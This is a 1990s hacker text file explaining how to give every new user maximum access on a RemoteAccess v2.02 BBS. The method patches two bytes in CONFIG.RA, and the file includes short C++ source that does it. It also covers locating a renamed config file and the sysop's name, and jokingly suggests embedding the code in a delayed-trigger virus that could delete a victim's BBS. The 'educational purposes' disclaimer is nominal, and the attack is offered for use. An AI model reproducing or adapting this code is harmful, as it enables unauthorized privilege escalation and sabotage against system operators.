HOW TO GIVE MAXIMUM ACCESS TO ANY NEW USER ON A REMOTEACCESS BBS. (RA v2.02) Written by Lourens Steyn AKA 'Stalker X' Disclaimer: I cannot be held responsible for the action's of the people who implement the knowledge is this text file. This text file is for educational purposes ONLY! This new and improved method of hacking a RemoteAccess BBS is very affective! This hack can be used in Windows, Windows95 and DOS software and even virus code. The code is tight and compact. This hack works by using the "SET RA=XX:\YYYY" setting in the autoexec.bat. If you need a hack that will find the CONFIG.RA without this setting you will need to do a DIR SCAN. If the sysop did rename this file then you can still find it BUT this procedure is SLOW. So how do we locate 'CONFIG.RA' if someone renamed it? At first I didn't think it was possible BUT: Well there is a easy way. Compare the environment variable 'RA' to the file your scanning. Get the string with the format [Str Length]{string} at offset 0x421 in the target file, if it's the same then you can be sure it's RemoteAccess's config file. If there is no enviroment variable then get the sting in the format [Str Length]{string} if you can change to the directory with that name then it's the config file! And you found what you where looking for. But lets stick at the normal way of doing things. We can access this environment variable in C++ so we know what the directory is of the 'config.ra' file. Next all we need to do is to edit the two bytes at offset 0x509 and 0x5A0 in the 'config.ra' file, set these bytes each to 0xFF. That's it! All the new users will get Maximum access to the system. In short the RA BBS if will be open to all for a big party. The RA program is so full of holes that one can sell it as cheese, BUT it's a rather good system considering it was written in PASCAL. All you really need to make sure is that this program is run on the host. Some go even further, if some sysop isn't in their good books they use the same method of locating the RemoteAccess config file BUT they do an extra scan to check who is the sysop of the bbs is. You can find the name of the sysop in the 'config.ra' file at offset 0x55E in the format of [Str Length]{string}. Some people go even as far as deleting the hole BBS if it finds the sysop! But we arn't like that are we? .. ARE WE? ..ARE WE? 8-) Naaa didn't think so. Ok here is the C++ Source. ------>CUT #include #include #include char* DIR; char RAC[255],ACC=0xFF; FILE* CONFIG; void main() {if((DIR=getenv("RA"))==NULL)return; strcpy(RAC,DIR); strcat(RAC,"\\CONFIG.RA"); if(!(CONFIG=fopen(RAC,"r+")))return; fseek(CONFIG,0x509,SEEK_SET); fwrite(&ACC,1,1,CONFIG); fwrite(&ACC,1,1,CONFIG); fclose(CONFIG); } ------>CUT This code would work rather nicely in a virus IF someone should ever try it. A Virus is a funny thing, it can hang around until it finds a sysop, maybe a year or so into the future then it does it's job. But we won't do something like that would we???? 8-] That's all folks. Remember: "He who rules with the sword die's by it." "He who rules with wisdom will gain it." and "It's all in the planning."